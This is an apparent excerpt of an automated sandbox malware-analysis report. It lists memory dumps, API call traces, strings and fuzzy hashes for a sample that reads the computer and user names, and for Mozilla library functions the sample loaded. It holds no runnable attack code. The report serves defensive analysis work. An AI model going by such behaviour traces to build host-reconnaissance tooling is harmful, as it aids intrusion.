Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: e953500463273f8293cb2bc7fb54cc9e4b88012e0429aa3acd2482a4df6cd32e
Instruction ID: 3ca812b924971d267d77bfb144184187129a905492ddd8636fbdfbd51f026f8c
Opcode Fuzzy Hash: e953500463273f8293cb2bc7fb54cc9e4b88012e0429aa3acd2482a4df6cd32e
Instruction Fuzzy Hash: 97E01231D4034C6BDB51EB50DC96FAE737C9B44B01F004295BA0C5B2C0DE70AB858B91

Function 00971190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987910
Part of subcall function 009878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987917
Part of subcall function 009878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0098792F

Part of subcall function 00987850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987880
Part of subcall function 00987850: RtlAllocateHeap.NTDLL(00000000), ref: 00987887
Part of subcall function 00987850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0098789F

ExitProcess.KERNEL32 ref: 009711C6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: ebd9238e8c5553ee6001baa42556f39f295f036d3a031599da9d950faf3d1041
Instruction ID: a0fc07c883860c48490da49546bb1d5da9f08640f510cc3062a6dc2ee071c176
Opcode Fuzzy Hash: ebd9238e8c5553ee6001baa42556f39f295f036d3a031599da9d950faf3d1041
Instruction Fuzzy Hash: E8E017B6D2830163CA1477F5AC8BB2B379C5B9434AF541928FA09D7342FE65E900C77A

Non-executed Functions

Function 6C5D5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C5D5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5D54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5D54BE
__Init_thread_footer.LIBCMT ref: 6C5D54DB

Part of subcall function 6C5FAB3F: EnterCriticalSection.KERNEL32(6C64E370,?,?,6C5C3527,6C64F6CC,?,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB49
Part of subcall function 6C5FAB3F: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C3527,6C64F6CC,?,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FAB7C

Part of subcall function 6C5FCBE8: GetCurrentProcess.KERNEL32(?,6C5C31A7), ref: 6C5FCBF1
Part of subcall function 6C5FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5C31A7), ref: 6C5FCBFA

GetCurrentThreadId.KERNEL32 ref: 6C5D54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C5D5516
GetCurrentThreadId.KERNEL32 ref: 6C5D556A
AcquireSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C5D5577
moz_xmalloc.MOZGLUE(00000070), ref: 6C5D5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C5D5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C5D55E6
ReleaseSRWLockExclusive.KERNEL32(6C64F4B8), ref: 6C5D5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5D5616

Part of subcall function 6C5FAB89: EnterCriticalSection.KERNEL32(6C64E370,?,?,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB94
Part of subcall function 6C5FAB89: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FABD1

GetCurrentThreadId.KERNEL32 ref: 6C5D563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5D5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C5D567C
free.MOZGLUE(?), ref: 6C5D56AE

Part of subcall function 6C5E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5E5EDB
Part of subcall function 6C5E5E90: memset.VCRUNTIME140(ewbl,000000E5,?), ref: 6C5E5F27
Part of subcall function 6C5E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5E5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C5D56E8
GetCurrentThreadId.KERNEL32 ref: 6C5D5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C5D570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C5D5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C5D574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C5D576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C5D5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C5D57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C5D57CA

Strings

MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C5D5749
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5D54A3
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C5D5D24
[I %d/%d] profiler_init, xrefs: 6C5D564E
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C5D5717
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C5D5CF9
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C5D5D2B
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C5D57AE
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5D57C5
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5D548D
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C5D5D1C
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C5D5724
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C5D5766
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C5D5C56
MOZ_PROFILER_STARTUP, xrefs: 6C5D55E1
GeckoMain, xrefs: 6C5D5554, 6C5D55D5
MOZ_BASE_PROFILER_HELP, xrefs: 6C5D5511
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C5D5791
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C5D5BBE
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C5D584E
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C5D5AC9
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C5D5D01
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C5D56E3
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C5D5B38
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5D54B9

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: a6d8e54d32423c77efea8af4f0bc62ad6c7fad9c62d0ded39dadd698d90c9a05
Instruction ID: 6d534aad34216bea5e323c1b59cbc5a2f3897b68fd067874a262c6bfcb87a6bf
Opcode Fuzzy Hash: a6d8e54d32423c77efea8af4f0bc62ad6c7fad9c62d0ded39dadd698d90c9a05
Instruction Fuzzy Hash: 412206B0A047009FE700AF79C84466A77B1EF8734CF95C929E94697B41EB31A849CB5F

Function 6C5D6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5D6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5D6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C5D6D26

Part of subcall function 6C5DCA10: malloc.MOZGLUE(?), ref: 6C5DCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C5D6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5D6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C5D6D73
free.MOZGLUE(00000000), ref: 6C5D6D80
CertGetNameStringW.CRYPT32 ref: 6C5D6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C5D6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5D6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C5D6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C5D6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C5D6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C5D6E34
CreateFileW.KERNEL32 ref: 6C5D6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C5D6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5D6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C5D709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5D7103
free.MOZGLUE(00000000), ref: 6C5D7153
CloseHandle.KERNEL32(?), ref: 6C5D7176
__Init_thread_footer.LIBCMT ref: 6C5D7209
__Init_thread_footer.LIBCMT ref: 6C5D723A
__Init_thread_footer.LIBCMT ref: 6C5D726B
__Init_thread_footer.LIBCMT ref: 6C5D729C
__Init_thread_footer.LIBCMT ref: 6C5D72DC
__Init_thread_footer.LIBCMT ref: 6C5D730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C5D73C2
VerSetConditionMask.NTDLL ref: 6C5D73F3
VerSetConditionMask.NTDLL ref: 6C5D73FF
VerSetConditionMask.NTDLL ref: 6C5D7406
VerSetConditionMask.NTDLL ref: 6C5D740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C5D741A
moz_xmalloc.MOZGLUE(?), ref: 6C5D755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5D7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C5D7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5D7598
free.MOZGLUE(00000000), ref: 6C5D75AC

Part of subcall function 6C5FAB89: EnterCriticalSection.KERNEL32(6C64E370,?,?,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284), ref: 6C5FAB94
Part of subcall function 6C5FAB89: LeaveCriticalSection.KERNEL32(6C64E370,?,6C5C34DE,6C64F6CC,?,?,?,?,?,?,?,6C5C3284,?,?,6C5E56F6), ref: 6C5FABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C5D72C8
wintrust.dll, xrefs: 6C5D72CD
(, xrefs: 6C5D768A
SHA256, xrefs: 6C5D6EC0

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: d9d1611bc70b2b67f2b808a7ba8d910240d395b0a1d3a1e161b42ec0584c6240
Instruction ID: 81113f8a6a90282bad42426eae7ddacb497895df6557e70750323d540c3c5d40
Opcode Fuzzy Hash: d9d1611bc70b2b67f2b808a7ba8d910240d395b0a1d3a1e161b42ec0584c6240
Instruction Fuzzy Hash: 5652F771A003159FEB21DF29CC84BAA77B8EF85708F118599E9099B640DB30BF85CF59

Function 6C600DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C600F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C600F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C600FB7
EnterCriticalSection.KERNEL32(?), ref: 6C600FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C601031
LeaveCriticalSection.KERNEL32(?), ref: 6C6010D0
EnterCriticalSection.KERNEL32(?), ref: 6C60117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C601C39
EnterCriticalSection.KERNEL32(6C64E744), ref: 6C603391
LeaveCriticalSection.KERNEL32(6C64E744), ref: 6C6033CD
LeaveCriticalSection.KERNEL32(?), ref: 6C603431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C603437

Strings

<jemalloc>, xrefs: 6C603941, 6C6039F1
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C603793
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6037BD
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6037A8
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6037D2
MOZ_CRASH(), xrefs: 6C603950
Compile-time page size does not divide the runtime one., xrefs: 6C603946
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C603559, 6C60382D, 6C603848
: (malloc) Unsupported character in malloc options: ', xrefs: 6C603A02
MALLOC_OPTIONS, xrefs: 6C6035FE

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 71bed232386519d6fc572bd20463fdfae1e8c0c3ab8235cc508611e16b233e34
Instruction ID: bcbbc3892483b7fbe976a6511f1f06722e6382b14feb3429a0e28ec6d556b748
Opcode Fuzzy Hash: 71bed232386519d6fc572bd20463fdfae1e8c0c3ab8235cc508611e16b233e34
Instruction Fuzzy Hash: 8B537F71B057018FD708CF29C680615FBE1BF89328F29C6ADE869AB791D771E841CB85

Function 6C6234A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C62355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6235BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6235E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C62363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6236CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C62373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C62378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6238BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6239EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C623EE2

Part of subcall function 6C626180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6261DD
Part of subcall function 6C626180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C62622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6240F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C62412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C624157

Part of subcall function 6C626180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C626250
Part of subcall function 6C626180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C626292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C62441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C624448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C62484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C624863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C624878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C624896
free.MOZGLUE ref: 6C62489F

Strings

, xrefs: 6C624CD2

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: e8cf5da075cbced52721bc1d16930d65f2486d653105f11d20f33cfc163f5087
Instruction ID: 425deda96fb47af931c991c5e30d7d9987df69aebf97534536190ece58baefe2
Opcode Fuzzy Hash: e8cf5da075cbced52721bc1d16930d65f2486d653105f11d20f33cfc163f5087
Instruction Fuzzy Hash: 34F24A74908B808FC725CF29C08469AFBF1FF8A348F118A5ED99997711DB719886CF46

Function 6C5D64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C5D64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C5D64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C5D6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C5D6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5D652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C5D671C
GetCurrentProcess.KERNEL32 ref: 6C5D6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5D672F
GetCurrentProcess.KERNEL32 ref: 6C5D6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5D6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C5D6A80
GetSystemInfo.KERNEL32(?), ref: 6C5D6ABE
__Init_thread_footer.LIBCMT ref: 6C5D6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5D6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5D6AF7

Strings

nvd3d9wrap.dll, xrefs: 6C5D6500
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C5D6798
detoured.dll, xrefs: 6C5D64DA
_etoured.dll, xrefs: 6C5D64ED
nvdxgiwrap.dll, xrefs: 6C5D6513
user32.dll, xrefs: 6C5D6526

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
